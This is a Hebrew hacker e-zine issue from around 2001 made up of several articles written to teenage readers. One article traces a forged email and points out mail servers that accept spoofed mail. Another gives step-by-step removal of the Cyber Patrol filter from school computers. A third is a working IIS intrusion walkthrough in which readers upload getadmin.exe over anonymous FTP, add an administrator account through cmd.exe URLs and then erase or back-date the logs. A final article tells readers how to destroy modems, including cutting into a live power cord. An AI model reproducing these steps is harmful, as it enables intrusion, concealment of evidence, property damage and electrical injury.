Message-Id  <[email protected]>  

לכל אימייל שנשלח דרך שרת כלשהוא (במקרה שלנו mailgw2.netvision.net.il)

יש מספר זהות מיוחד (ID). ככה המנהל יכול לבדוק בדיוק מי שלח, לאן וכולי.

הספרות שלפני הנקודה מציינות תאריך: 200104241219. שזה אומר 24/04/2001

בשעה 12:19.

הספרות שאחרי הנקודה הן מספר הזהות המיוחד של האימייל.

 

רגע! כתוב פה שזה נשלח ב24 באפריל! אבל באימייל עצמו היה כתוב ה-6 באפריל!

ולא רק זה, גיליון 5 יצא רק ב20 ומשהו באפריל. הנה עוד הוכחה שהאימייל מזויף.

ולא רק זה, אלא גם התאריך מזויף. למה שמישהו ירצה לזייף תאריך?

אל תשאלו אותי...

בכל זאת, עדיין היו לי ספקות, ולכן החלטתי לוודא שהוא באמת מזויף.

לפי הכותרת אנחנו יודעים שהוא נשלח מנטוויז'ן - mailgw2.netvision.net.il,

אבל כתוב שהוא נשלח מwalla.co.il. אז הלכתי לאתר של נטוויז'ן וראיתי שהם

ממליצים על מנוע החיפוש נענע שהוא למיטב ידיעתי המתחרה של וואלה ולכן לא

הגיוני שואללה יושבים על נטוויז'ן. סתם בשביל הכיף נכנסתי גם לואללה, פתחתי

חלון דוס והקלדתי:

tracert www.walla.co.il

וזה מה שקיבלתי...

 

]ms   261 ms   275 ms  diup-202-6.inter.net.il [213.8.202.6 257   1

]2   253 ms   261 ms   275 ms  diup-202-1.inter.net.il [213.8.202.1

3   266 ms   392 ms   327 ms  213.8.8.153

4   267 ms   273 ms   261 ms  192.116.202.158

5   252 ms   274 ms   274 ms  192.117.159.22

.6     *        *        *     Request timed out

.7     *        *        *     Request timed out

8

 

 

הפקודה tracert בודקת באיזה נתיבים עובר המידע שנשלח לואללה, זאת אומרת דרך

איזה מחשבים. שתי השורות הראשונות קשורות למחשב שלי (אינטרנט זהב).

לא מצאתי שם שום דבר שקשור איכשהוא לנטוויז'ן. סתם בשביל ידע כללי,

שימו לב שהמידע עובר דרך עוד 2 מחשבים שנמצאים על אינטרנט זהב - מכיוון ששני

איי-פיים מתחילים ב- 213.8.202. אחד מהם הוא מן הסתם האייפי שלי אז זה אומר

שעוד מחשב על אינטרנט זהב מקבל את הנתונים לפני שהוא שולח לי. עוד השערה -

וואלה נמצא על שרת נפרד, לא קשור לשום דבר ובטח שלא לנטוויז'ן.

טוב, אז מה עושים?

יש לנו את הכתובת שממנה האימייל נשלח. א-ב-ל אחרי בירור קצר גיליתי שנטויז'ן

לא נותנות אייפיים סטטיים (זאת אומרת אייפיים קבועים, כמו שיש לאתרים), ואז

כל פעם שמתחברים מקבלים אייפי אחר.

אז כמו שאמרתי לכם, על כל שרת מייל כמעט יש רישום של הודעות שנשלחו מאותו שרת.

המנהל של השרת יכול לבדוק ולדעת בדיוק מי שלח מאיפה וכולי.

שלחתי אימייל ל[email protected] וביקשתי מהם שיתנו לי את כתובת האימייל

האמיתית של מי ששלח בתאריך 24.4.2001 מהאייפי 62.0.147.2 הודעה עם מספר

זהות PAA26992. הם ענו שבלי צו של בית משפט הם לא יכולים למסור לי שום פרטים

על חשבונות של אנשים. :(

טוב... מנהל נטויזן הוא היחיד שיכול לברר לי מי זה (האלטרנטיבה היא לפרוץ

לנטוויז'ן...) אז אין מה לעשות. אני רק רציתי להתנצל על זה שפירסמנו חשבונות

בנק... :)

 

 

סתם בשביל הכיף, טלנטתי ל mailgw2.netvision.net.il ול - smv347-ec.mail.com

פורט 25. השרת לא מבקש פקודת זיהוי helo! זה מקל על הזיוף.

שרתים די נחמדים האמת, והדבר הכי טוב בהם - הם נותנים לזייף מכל דומיין ניים

ולכל דומיין ניים. (יש כאלה שנותנים לזייף רק לכתובות של הדומיין ניימים שלהם).

ניסיתי גם לבדוק מי זה 62.0.147.2 שהיה מחובר באותו רגע

(גיליתי את זה ע"י הפקודה Ping). חקרתי קצת באמצעות netstat ו nbtstat וגיליתי

מחשב חמוד בשם "ישראל", שימו לב לזה:

 

Zero Cool C:\WINDOWS>nbtstat -a 62.0.147.2

 

 

NetBIOS Remote Machine Name Table

 

Name               Type         Status

---------------------------------------------

ISRAEL         <00>  UNIQUE      Registered

NONE           <00>  GROUP       Registered

ISRAEL         <03>  UNIQUE      Registered

 

MAC Address = 44-45-53-54-00-00

54-00-00

 

איזה יופי.. שיתופים.. טוב ממילא זה לא המחשב שרציתי.

 

אז מה כן יצא לנו מהטקסט המבולגן הזה??

למדנו איך לאתר מקור של אימייל. לדעת מאיפה הוא נשלח, האם הוא מזויף וקצת

פרטים על השולח (אנחנו יודעים שהוא מירושלים.. יש..).

שימו לב שאם האייפי ממנו נשלח האימייל היה סטטי היינו יכולים לברר המון

פרטים על המחשב השולח ואולי גם לפרוץ לשם.

למדנו גם לשים לב לגרסאות תוכנה. גרסאות ישנות מאוד יכולות להכיל דברים

מעניינים מאוד לפעמים.

למדנו על מספרי זהות של אימיילים, וכן, למדנו שכשאנחנו מזייפים אימייל

אפשר לעלות עלינו בקלות. אם אתם רוצים לזייף טוב, נסו שרתים שונים ובדקו

את הכותרות כדי לראות מה הכי טוב.

הכרנו את הפקודה tracert שתשמש אותנו הרבה כדי לעקוב אחרי העברת מידע

בין מחשבים.

מצאנו שני שרתי אימייל חביבים שיזייפו לנו כל מה שנרצה בחינם וגם מחשב

בודד בשם ישראל שזקוק לאימוץ.

טוב, אז לי היה כיף למרות שלא יצא מזה כלום, לכם היה מעניין אני מקווה,

וגם אם לא לפחות למדתם משהו חדש.

ביי,

            "להתראות, שלום

            זה לא נגמר, זה רק הסוף"

                                    אוהבת תמיד,

                                                Blood Runner

החלפת מסכי הפעלה/כיבוי

 

 

   "בנאדם לא נולד אהבל, הוא גודל להיות כזה במסגרות ומוסדות כמו של מערכת החינוך בישראל."

                                                                                  (גיהנום)

                                               

                                              (*)(*)

                                               )  (

                                              (    )

                                      נחשו מי או מה אני??  

 

שלא כמו במערכת לינוקס, מערכת ההפעלה ווינדוס אינה נותנת למשתמש שליטה מלאה, אלא להיפך.

אז אולי אתם יכולים להחליף את תמונת הרקע בשולחן העבודה, ולבחור איזה שמות לתת לקבצים אבל

בסופו של דבר כוח השליטה שלכם על מערכת ההפעלה שמותקנת אצלכם במחשב, אפסית. היום כל זה יישתנה??

לא. אבל אני אלמד אתכם משהו חמוד. אצל רובכם, כשאתם מדליקים את המחשב, יש את סמל החלונות של ווינדוס

ומאחוריו רקע כחול. למטה כתוב:

Microsoft Windows 98

או

Microsoft Windows 95

חוץ מזה, כשאתם מכבים את המחשב, אז לרובכם המסך שחור, וכתוב משהו כמו:

'כעת ניתן לכבות את המחשב' בצבע כתום. אני מקווה מאוד שאתם יודעים למה אני מתכוון. בכל מקרה,

לא משנה איך נראים אצלכם מסכי ההפעלה/כיבוי, היום אתם עומדים לשנות אותם (אם אתם רוצים) לאיך

שאתם רוצים שהם ייראו. פיתחו את עורך הגרפיקה האהוב עליכם. לא משנה אם זה Paint Shot Pro,

או Photoshop או כל דבר אחר. אם אתם לא יודעים מה זה עורך גרפיקה או חושבים שאין לכם, תיאלצו

להשתמש באחד פשוט שמגיע יחד עם מערכת הווינדוס שלכם, הרי זו תוכנת MS Paint.

בכדי להפעיל אותה לחצו על התחל -> הפעלה...

בחלון שנפתח הקלידו:

C:\Program Files\Accessories\mspaint.exe

ולחיצו על מקש ה <Enter>. לא באמת התכוונתי שתקלידו את כל השורה הזאת, סמנו אותה עם העכבר ולחיצו

על Ctrl + C. זה ייבצע פעולת העתקה. בחלון "הפעלה..." לחצו על Ctrl + V. זה ייבצע פעולת הדבקה

וככה תחסכו את כל ההקלדה. אז אתם נמצאים בתוך העורך הגרפי שלכם. כעת פיתחו את הקובץ הבא:

C:\logo.sys

חשוב שתפתחו אותו בתוך עורך הגרפיקה. אם זה לא מצליח לפתוח את הקובץ נסו את:

C:\ip.sys

כמו שאתם שמים לב יש לפניכם עכשיו את מסך ההפעלה של ווינדוס. למה לעזאזל הוא בקובץ מערכת???

(sys.)

כי מיקרוסופט מצד אחד היו צריכים להחביא את הקובץ, מצד שני היו צריכים שיהיה באפשרותם לגרום לו

שינויים גם אחרי שמערכת ההפעלה כבר הותקנה במחשב, בלי להתקין מחדש מדיסק אחר שבו השינויים נעשו

בתיכנות עצמו. אז הם שמרו את מסכי ההעפלה/כיבוי בתוך קובץ מערכת, דבר חכם כי למה לעזאזל שמישהו

יישחק עם קובץ מערכת? זה בד"כ יהרוס את המחשב... מי בעולם ישחק עם קבצים כאלה?????

אנחנו. טוב, אז תשתמשו בכלים שבתוכנת הגרפיקה שלכם כדי לשנות את מסך ההפעלה לאיך שאתם רוצים שייראה.

אם אתם רוצים אתם גם יכולים לקחת תמונה אחרת (של מרילין מנסון לדוגמא, או אפילו של עצמיכם), ולשמור

אותה על שם הקובץ C:\logo.sys

ואז בכל פעם שתפעילו את המחשב זה יופיע!!!

רק דבר אחד קטן, חשוב מאוד שהתמונה תהיה בגודל רוחב 320 וגובה 400 בפיקסלים. גודל הקובץ לא חשוב

אז גם אם זאת תמונה של מאה מגהבייט זה בסדר. (טוב אולי הגזמתי, אבל גודל הקובץ פה לא עקרוני).

אז אם התמונה שלכם לא בגודל המתאים פיתחו אותה עם העורך הגרפי ושנו את גודל התמונה ל 320 על 400.

מה עוד נשאר לנו? מסכי הכיבוי. בתוך העורך הגרפי פיתחו את הקובץ:

C:\windows\logow.sys

כעת פיתחו את:

C:\windows\logos.sys

כל מה שהסברתי על הקובץ C:\logo.sys נכון גם לגבי הקבצים האלה. זה אולי לא נראה לכם דבר כזה

מגניב, אבל פעם הבאה שתגיעו לבית ספר, אם יש לכם שם מחשבים, אני חושב שתסכימו איתי שיהיה די כייף

ומצחיק אם תחליפו את מסכי ההפעלה/כיבוי בתמונת פורנו או School Sucks!!!!

שלכם, גיהנום

 

 

מספרים שימושים

 

שלום לכולם!

 

הרבה זמן לא הייתה כתבה טובה על טלפוניה.

גם הכתבה הזאת עדיין לא משהו.

אבל לפחות זה משהו.

 

 

היום נלמד כמה "מספרים סודיים" לטלפון רגיל של בזק.

כמעט כולם מכירים את הקודים לפלאפונים של סלקום / אורנג'/ פלאפון,

אבל את הקודים לבזק כמעט אף אחד לא מכיר.

 

קוד ראשון: 110.

פשוט הרימו את הטלפון, וחייגו 110. תענה לכם הקלטה שתקריא לכם את...

מספר הטלפון שלכם! למה זה שימושי לעזאזל, שאלתם? אז הנה:

 - אם יש לכם כמה קווים בבית, ואתם רוצים לבדוק אם שקע מסוים שייך למספר

   אחד או לשני.

 - אם אתם אצל מישהו בבית, שמסרב לתת לכם את מספר הטלפון שלו.

 - אם אתם בטלפון ציבורי, ואתם רוצים לדעת מה המספר שלו כדי שיתקשרו

   אליכם חזרה.

 - כל דבר אחר שעולה לכם בראש.

 

קוד נוסף: 113.

פשוט הרימו את הטלפון, וחייגו 113. תשמעו כמה צפצופים, מהירים יותר

מצליל שיש אחרי שמחייגים ועד שעונים לכם, אבל איטי יותר מצליל תפוס.

אחרי כמה צפצופים כאלה, קו הטלפון שלכם פשוט ימות! טלפונים שלא מחוברים

לחשמל, יעני טלפונים פשוטים לא אלחוטיים ובלי מזכירה, יפסיקו בכלל לפעול

כאילו הוצאתם אותם מהשקע.

ועוד דבר: זה זמני, רק בערך 2 דקות. אחרי 2 דקות הקו יחזור. אחרי שהוא

חוזר, בהתחלה הוא יעשה צפצופים כמו קודם, אבל אז תניחו את השפורפרת במקום

ותוך עוד איזה דקה זה יסתדר.

למה זה שימושי לעזאזל, שאלתם? אז הנה: (יש לי דז'ה וו עכשיו)

 - לעבוד על מישהו שאתם אצלו - לבקש ממנו לעשות שיחה, להרוג לו את הקו,

   ואז להגיד לו שהקו לא עובד, מראים לו, והוא נכנס לפניקה!

 

עוד קוד: 114.

פשוט חייגו אותו, יהיה צליל המתנה של אחרי חיוג, ואז הוא פשוט יתחיל

לצפצף כמו משוגע. למה זה טוב? זה לא.

 

הקוד הבא: 112.

אתם בטח יודעים, שמי שלא בחר מפעיל בין לאומי - החיוג באמצעות 00 או 188

נחסם בשבילו, וכשהוא מנסה לחייג עם 00 או 188 אז הוא מקבל הודעה שהוא לא

יכול. בעצם, הוא מופנה עם "עקוב אחרי" אל המספר 112, שם נמצאת ההודעה.

אז אם תחייגו 112 תשמעו את ההודעה.

למה זה טוב לעזאזל? אפשר ללמוד להגיד "שירות החיוג באמצעות 00 ו-188 חסום"

באנגלית, ערבית, ורוסית.

 

טיפ קטן: אם יש לכם טלפון ישן, שמחייג ב"מתקפים" (שלוחצים על 5, שומעים 5

תקתוקים) אז אתם לא יכולים להשתמש בכל מיני "שרותי טלפון" שמבקשים ממכם ללחוץ

על מספרים, כמו למשל טלמסרים למיניהם. אז בחלק מהטלפונים האלה, אם תחייגו * לפני

המספר, הטלפון יחייג בחיוג צלילים - השיטה הנורמלית, שלכל מקש יש צליל.

 

אם יש לכם פלאפון, כנסו לספר טלפונים שלו והוסיפו שם חדש שקוראים לו:

umop apis dn

מה כתוב כאן? הפכו את הטלפון וגלו!

 

מנגינות בטלפון!

-------------------

3212333-222-333-3212333-22321-1

(איפה שיש "-" לוחצים יותר זמן על המקש)

חייגו את המספר הזה - ותקשיבו בזמן שאתם מחייגים - ותשמעו את השיר "למרים טלה קטן".

מי שלמד אי פעם נגינה, מכיר את השיר הזה כי זה השיר הראשון שלומדים כשלומדים נגינה.

 

7486168 - חייגו את המספר הזה ותשמעו את ההתחלה של "ברני"! כדאי לחייג * או משהו כזה

קודם, כי מספר כזה באמת קיים ומישהו עשוי לענות לכם.

 

1131222 - זה עולם קטן מאוד.

 

אז זהו בינתיים

ביי,

 

בנץ.

 

 

 

 

נטרול תוכנת סייבר-פורטל

 

היי!

 

כולם כאן בטח מכירים את התוכנה סייבר-פטרול. זאת תוכנת פילטר לאתרי אינטרנט,

שהרבה בתי ספר משתמשים בה כדי שהתלמידים לא יגלשו לאתרי סקס וכו'.

הבעיה עם התוכנה הזאת, שאם מנסים למחוק אותה ידנית, היא חוסמת לחלוטין את המחשב

ולא נותנת לכם להפעיל אפילו את ווינדוס.

אז אם בבית ספר שלכם יש את סייבר-פטרול וחשקה נפשכם בכמה "אתרים אסורים",

זו ממש לא בעיה לעקוף את סייבר-פטרול גם בלי הסיסמה.

אני יוצא מנקודת הנחה שאתם מכירים "קצת" את דוס, ואם לא, תפנו לגיליון מס' 2 של

גיהינום,

הוא מסביר שם קצת על דוס.

 

----------------------------------------------------------------------------------

הערה חשובה: תעשו את זה רק במחשבים של בית ספר או מחשב אחר שיש בו סייבר פטרול

ושממש

לא אכפת לכם מהמחשב. למה? בגלל שיכול להיות שאם תטעו באות אחת תמחקו קובץ לא

נכון

ותהרסו את המחשב. אבל הכל תעשו בשביל סקס, לא?

----------------------------------------------------------------------------------

 

 

כל מה שצריך לעשות זה:

 

1. להפעיל את המחשב במצב דוס אמיתי (לא דוס מתוך ווינדוס), כלומר להפעיל את

המחשב

   מחדש, וללחוץ על אף-8 עד שמופיע התפריט איתחול. בוחרים שם את האפשרות

   Command Prompt Only

   ואז מגיעים למצב דוס.

 

2. נכנסים לספריה של ווינדוס, ומוחקים את הקובץ ATM.SYS - זהו הקובץ הסודי

שעושה

   שאם תמחקו את התוכנה ווינדוס לא יעלה. הקובץ אמור להיות מוגן - אבל את זה

עוקפים ככה:

   attrib -r -s -h atm.sys

   כמובן שאת זה עושים רק אחרי שנכנסתם לספריה של ווינדוס. אחרי שהסרתם את

ההגנה, מחקו את

   הקובץ ככה:

   del atm.sys

 

3. כותבים את זה שאתם עדיין בספריה של ווינדוס (תעשו יישור לשמאל):

attrib -r -s -h SYSTEM.386

attrib -r -s -h system\system.drv

copy system.386 system\system.drv

אם הוא שואל, תלחצו על כן.

del system.386

   הסבר למה שעשינו פה, למי שרוצה לדעת: הסרנו את הגנת המחיקה לשני קבצים.

   את הקובץ סיסטם.386 מהספריה של ווינדוס העתקנו "על" הקובץ סיסטם.דרב ואז

   ומחקנו את הקובץ סיסטם.386.

 

4. מוחקים לחלוטין את הספריה c:\patrol

 

5. מוחקים את הקבצים הבאים, בספריה של ווינדוס. אם הם לא קיימים, זה בסדר.

   פשוט זה תלוי איזה גרסה של סייברפטרול יש לכם.

ilc.exe

iic.exe

lic.exe

llc.exe

ic.exe

lc.exe

icfire.exe

lcfire.exe

icp.log

lcp.log

nt16.dll

ts.dll

ts16.dll

ts32.dll

tsnt.dll

tsntx.exe

usage.log

usage5.log

llc.exe

 

6. מהספרייה סיסטם או סיסטם32 שבתוך הספריה של ווינדוס תמחקו את הקובץ

isystem.drv ו lsystem.drv

 

עכשיו תעשו ריסט ותפעילו את ווינדוס כרגיל. זהו! אין סייבר פטרול!

אם אתם רוצים לנקות ממש ממש, תמחקו מהרג'יסטרי את מה שמפעיל את סייבר פטרול

ככה:

- תפעילו את הקובץ regedit.exe

- תמחקו את ה-registry keys האלו:

HKEY_LOCAL_MACHINE\SOFTWARE\CYBER PATROL

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\CYBER

PATROL

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CYBER

PATROL

 

זהו! גמרנו! סייבר פטרול הלך ולא יחזור! לפחות עד שבית הספר יעלה על זה ויתקינו

אותו

עוד פעם. ואתם תמחקו אותו עוד פעם. והם יעלו על זה ויתקינו אותו עוד פעם. ואתם

תמחקו.

וככה עד שתסיימו את בית ספר. או שלא.

 

טוב אז ביי עד לפעם האחרונה,

בנץ.

 

פריצה לאתרים – דוגמאות לאקספלויטים

 

Hello motherfucker

 

מה שלומכם? :9

בטח ראיתם שכבר הרבההההה זמן לא היו כתבות ממני וזה מכמה סיבות:

א. סייממממתתתתייייי בבבבייייתתתתת ספפפפפררררררררר!!!!!

אז הייתי עסוקה בלחגוג. (הקפצנו קולה ודרסנו זקנות)

ב. אני עסוקה בלהביא לכם אותה ב ה-כתבה ה-פ33ה אבל אני עוד תקועה שם (גיהנום האני, אל תחכה, אני אצטרך ללמוד ספר שלם על ASP בשביל זה..)

ג. כתבתי שירים כל היום (סתם, כולה 2) -> שייקספיר ממכר.

ד. לא בא לי עליכם.

 

שיא עולמי: תגידו קרה פעם שמישהו התקשר אליכם ולא עניתם ואחרי פחות מחצי שעה ראיתם 39 שיחות שלא נענו? (זיפ בטח מחייך עכשיו).

 

ועכשיו קצת חדשות: זוכרים שאמרתי לכם לפני שנים על כנס ההאקרים השנה? אז זהווו שיש פגישת מארגנים בשבוע הבא (תאכלו את הלב יהיה לי חולצה של מארגן) אז מאוד בקרוב אני אהיה חכמה יותר להגיד לכם מה חדש. בטח עד שהכתבה הזאת תתפרסם כבר אני אדע מה קורה.

 

והיום ילדים, נלמד שיטה לפריצת אתרים! ממש ככה. אתם תלמדו היום איך לפרוץ מערכות פגיעות עם מנהלים טפשים ששכחו לחסום גישה לתיקייה בשם cgi-bin!!

זוהי הכתבה הראשונה בסדרת כתבות על IIS:

(ייתכן שיקח לי עוד זמן לפרסם את השאר, אז אנא האזרו בשבלולנות)

בכתבות הבאות בנושא אני אסביר יותר לעומק מה זה IIS ואיך היא עובדת, ולכן לצורך העניין הסברתי כאן ממש בכלליות. אז אני גאה להציג את...

 

========================================================

IIS HACKING NO.1 : HOW TO HACK THROUGH THE CGI-BIN

========================================================

כן כן, ממש להשיג admin rights...           

 

אז מה זה שרת המריץ IIS?

זוהי מערכת המשתמשת ב IIS (Internet Infrmation Server) שזה שרת אינטרנט ותוכנות לניהול האינטרנט. של מייקרוסופט. אוווו... ואתם יודעים מה זה אומר...

לדוגמה אתם חוקרים אתר של חברה מסויימת. איך תדעו אם הוא משתמש ב IIS? לרוב ניתן להשיג את זה דרך פורט 80. התבוננו בהודעת השגיאה שתקבלו אם תקישו get HTTP או סתם שטויות:

HTTP/1.1 400 Bad Request

Server: Microsoft-IIS/4.0

Date: Wed, 30 May 2001 20:47:31 GMT

Content-Length: 407

Content-Type: text/html

השרת מודיע לנו שהוא מריץ IIS.

 

הפריצה:

טוב... נסו את הFTP. פורט 21. אם אין לכם חשבון על אותו שרת, נסו להכנס בשם

anonymous

(בחלון דוס, הקלידו:

ftp www.victim.com

המחשב יגיב:

Connected to www.company.com.

220 VICTIM Microsoft FTP Service (Version 3.0).

((User : (www.comapny.com:(none

הקלידו:

anonymous

השרת יבקש כתובת אימייל בתור סיסמה. המציאו משהו.

password [email protected] )

 

כעת, שימו לב שהשרת אמר את השם שלו: VICTIM Microsoft FTP Service (Version 3.0). שם השרת הוא VICTIM. זה אומר, שבמערכת ה IIS חשבון ה anonymous יקרא IUSR_VICTIM. נזכור זאת לשימוש מאוחר יותר.

 

השיטה הזאת תעבוד אך ורק אם יש לכם הרשאה להעלות קבצים לספריה cgi-bin. נסו להכנס לספריה זו באמצעות

cd (לחצו על אנטר)

cgi-bin .

(כדי לבדוק באיזה ספריה אתם, הפקודה: pwd).

נניח שהצלחתם להכנס לתיקיה בלי access denied, נסו להעלות קובץ לשרת. צרו קובץ טקסט ריק לדוגמה ונסו להעלות אותו באמצעות הפקודה:

put c:\mytext.txt

אם הפקודה תתבצע כראוי תראו שהשרת מקבל את הקובץ ומאשר את הקבלה: 200 PORT command successful.

הקלידו

dir

כדי לראות את רשימת הקבצים.

הצלחתם להעלות קובץ ל cgi-bin? אתם מסודרים.

כעת, לאלה מכם שמשתמשים ב NT, בדקו אם יש לכם את הקבצים cmd.exe, gasys.dll ו getadmin.exe

לאלה מכם שלא על NT או לאלה מכם שכן אבל אין להם את הקבצים הנ"ל, לכו למנוע החיפוש החביב עליכם והשיגו את הקבצים. (או בקשו ממשתמשי NT את cmd.exe, gasys.dll). בכל מקרה, את getadmin.exe לא קשה להשיג.

ועכשיווו... פתחו את ה FTP שוב, והקלידו

binary (פתיחת התקשרות לקבלת קובץ בינארי)

ואז

put cmd.exe

put gasys.dll

put getadmin.exe

סגרו את ה FTP.

כעת, פתחו את הדפדפן שלכם והקלידו:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_VICTIM

הדפדפן יענה:

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers.

אתם יודעים מה זה אומר? שכעת למשתמש IUSR_VICTIM יש הרשאות של משתמש על! (אדמין). בואו ניצור חשבון חדש בשם gehenom שסיסמתו תהיה: underground. שוב בחלון הדפדפן הקלידו

http://www.company.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20gehenom%20underground%20/add

וכדי לתת גם לחשבון הזה זכויות של משתמש על,

http://www.company.com/cgi-bin/getadmin.exe?gehenom

כעת התחברו שוב ל FTP, אבל הפעם בתור המשתמש gehenom והסיסמה password.

זהו! עכשיו אתם שולטים במערכת! אם אתם משתמשים ב NT אתם יכולים להעזר ב User Manager וב Server Manager כדי לשלוט על המערכת.

קחו כוס קולה, תחגגו את הרגע, ואז תעשו מה שתמיד חלמתם לעשות על אותה מערכת (אני לא ממליצה למחוק קבצים, זה סתם מנייאקי)

 

ניקיון:

אל תשכחו להכנס לכונן $C (מוסתר) לספריה Winnt\system32\logfiles  ולעדכן את הלוג של אותו יום, זאת אומרת למחוק כל זכר לכך שהייתם שם. שמרו את הלוג החדש. אם זה עושה לכם בעיות, לפחות שנו את התאריך של הלוג כדי לא להחשיד:

http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98 

אל תשכחו להוריד מהאנונימוס את הרשאות משתמש העל, ולמחוק את החשבון שיצרתם (gehenom) ואת הקבצים שהעלתם לשרת

(dele cmd.exe

dele gasys.dll

dele getadmin.exe)

בדקו אם אין עוד לוגים ששכחתם לעדכן, ועזבו את השרת.

 

יש לציין כי השיטה עובדת *רק* במקרה שיש גישה ל cgi-bin  ורשות להעלות קבצים, וזה מאוד מאוד נדיר למצוא שרת כ"כ פגיע.

 

למה זה עובד?

כי ב IIS ספריית ה cgi-bin משמשת לאחסון סקריפטים שהמשתמש יכול להריץ. אם העליתם לשם אקספלוייט (במקרה שלנו getadmin.exe) השרת יכול להריץ אותו דרך שורת הכתובת (ז"א דרך הדפדפן). בניגוד לספריות אחרות על השרת, קובץ המועלה ל cgi-bin רץ על השרת *עצמו* ולא על המחשב שלכם! לכן כאשר מעלים לשם אקספלוייט הוא ירוץ על המערכת עצמה ויפרוץ אותה.

 

קרדיטים:

את השיטה הזאת למדתי מקובץ בשם hacking-nt שמאוד קל למצוא על האינטרנט

למעוניינים חפשו hacking-nt, זהו הקובץ שמתחיל במילים:

Johnny Hacker has a Windows NT Server at home.

 

חכו לעוד כתבות בעניין, אבל תסלחו לי אם זה יקח קצת זמן

Drink disgusting Cherry Cokes

and happy hacking

                                    שלכם,

                                                בלאדי.

 

 

 

 

 

 

איך לשפר ביצועים ועד איך לחבל במודמים

 

שירות וואו של בזק מסופק ב 80 אחוז מהערים בארץ ישראל.

כאשר אתם מזמינים את השירות אתה נתקעים בשבועיים בממוצע המתנה להתקנה ואז מתבאסים (לא בכל המקרים.)

שירות וואו של בזק הוא עובד דרך ADSL.

ADSL הוא חיבור לאינטרנט במהירות יותר גבוהה ממה שהייתם רגילים לו.

אם מישהו אמר לכם שזה לא שווה את הכסף שזה עולה (וזה די יקר) הוא משקר אבל כמו כן,

מי שאמר לכם שזה שווה הוא כמו כן שקרן.

בזק מחלקת את הארץ לשני חלקים, חלק אשר מקבל את מודם האלקטל וחלק את מודם האורכית.

קצת על כל מודם וביצועיו ואיך להרוס אותו טוטאלית:

מודם אלקטל של בזק :

-------------------------------------------------------------------------------------

מודם מכוער וארוך בצבע שחור.

בזק אומרת שכל המודמים מוגבלים בקיבולת שלהם אבל מודם אלטקל מוכיח את טענתם.

כל מי שאני מכיר שיש לו אלקטל מתבאס מת ואפילו מתנתק מהשירות.

בממוצע מודם אלקטל יביא לכם את הביצועים הבאים:

Test :

*246kb/s (Down)

*11kb/s (Up)

אבל כמובן יש דרכים לשפר את הביצועים.

1. לעבור עיר ואז לקבל מודם אחר.

2. לקנות ממישהו מודם אורכית ולעשות את ההתקנה ולהיזהר שבזק לא יגלו.

3. להכין קובץ REG חדש ולכתוב בפנים :

------------------------------------------------------------------------------------

REGEDIT4

 

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]

"DefaultRcvWindow"="64245"

------------------------------------------------------------------------------------

הקובץ הזה בעצם משנה כמה דברים ברג'יסטי אבל אני לא אפרט כי זה לא נחוץ לנו.

אתם יכולים לשחק עם הטווח אבל תיזהרו לא לקפוץ למרחקים שלא תחזרו מהם.

תלכו מקסימום 12 מספרים קדימה או אחורה.

 64233 <- 64245 -> 64257.

אנרכיה - אם ברצונכם להרוס את המודם טוטאלית אבל בדרך מקורית...

מאחורי המודם יש שם כפתור אשר מאפס את המודם (Restart) אשר עליו תלחצו עם מוט, קיסם וכו'.

שימו שם את הפריט שאיתו אתם לוחצים והדביקו אם צלוטייפ (או כל חומר דביק אחר).

מה קורה עכשיו : האיפוס ימשיך הרבה זמן והמודם יתחיל להתחרפן,

תהיה הפסקת חשמל קטנה אבל אתם כולה מחזירים את הפלאג בארון החשמל למקום.

אל תשכחו לוודאות שבזמן שאתם עושים את הנ"ל המודם מחובר לחשמל !!!!!!

(אבל שלא יהיה מחובר למחשב, מומלץ, כי זה יכול גם אתם יודעים, לשרוף משהו בבלוק).

-------------------------------------------------------------------------------------

מודם אורכית של בזק:

-------------------

מודם קטן ויפיפיה אשר לא מוגבל.

אנשים עם מודם כזה לא יורדים מהמאה חמישים קיי בהורדה ומעלים מהירות נורמלית.

ממוצע של מודם אורכית :

Test :

*341kb/s (Down)

*102kb/s (Up)

אבל גם את זה אפשר לשפר.

מה עושים : יש שני שיטות שאני מכיר והם הכי טובות:

1.

Go to NETWORK , press on Proporties.

Choose DIAL-UP ADAPTER, press on Proporties.

Go to Advanced, go to Ip PACKTE SIZE.

change the value from Automatic to ------ >> MEDIUM.

2. פתחו קובץ REG חדש וכתוב שם:

------------------------------------------------------------------------------------

REGEDIT4

 

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]

"DefaultRcvWindow"="64249"

------------------------------------------------------------------------------------

אנרכיה :

דרכים להרוס מודם אורכית:

על מודם האורכית הנחמד שלנו אין כפתורים לאיפוס ובלה בלה.

אז פשוט קחו את החוט אשר יוצא מהמודם לחשמל, פתחו אותו אם סכין, חשפו את החוטים בפנים,

תחכתכו אחד מהחוטים אשר תמצאו בפנים וחברו שוב לחשמל, אני לא מספר מה קורה, אם אתם רוצים לדעת ,

תנסו, למרות שאני לא ממליץ בחום !!!

------------------------------------------------------------------------------------

הסברים אחרונים למאותגרים שלא הבינו מה עושים.

* לאחר שכותבים קובץ REG, שומרים אותו , אז מפעילים אותו , הוא ישאל אתכם בלה בלה ואז אומרים "כן".

** מודם אלקטל לא תמיד יהיה מסריח וגם אורכית לא תמיד יהיה טוב , יש עוד פרמטרים אשר קובעים מהירות:

1. המרחק מהמרכזיה לבית שלכם.

2. החוטים של הטלפון, חדשים ישנים סדוקים גמורים או מה... ככל שיותר חדשים יותר טוב.

*** עכשיו שימו לב השיטות של שיפור הביצועים היא לא תמיד תעבוד, זה תלוי במרכזיה אשר בעיר שלכם

אם היא ישנה יחסית לשירות אז זה יעבוד אבל אם היא חדשה אז תשכחו מזה !!!!

 

זהו , רק שתדעו בזק הם בני זונות אשר גונבים כספים ואני ממליץ:

"רק למי שיש כסף בצד שיתחבר, כי לאנשים יותר פשוטים עדיך להוציא את הכסף על דברים אחרים,

כמוני :))))))))))).

------------- עודכן ביום חמישי, 22/02/01 ------------- ע"י פירסינג -------------------------

זוכרים שכתבתי למעלה שעושים למודם אורכית (restart) ריבוט ע"י הוצאה מהחשמל ! אל תעשו את זה.

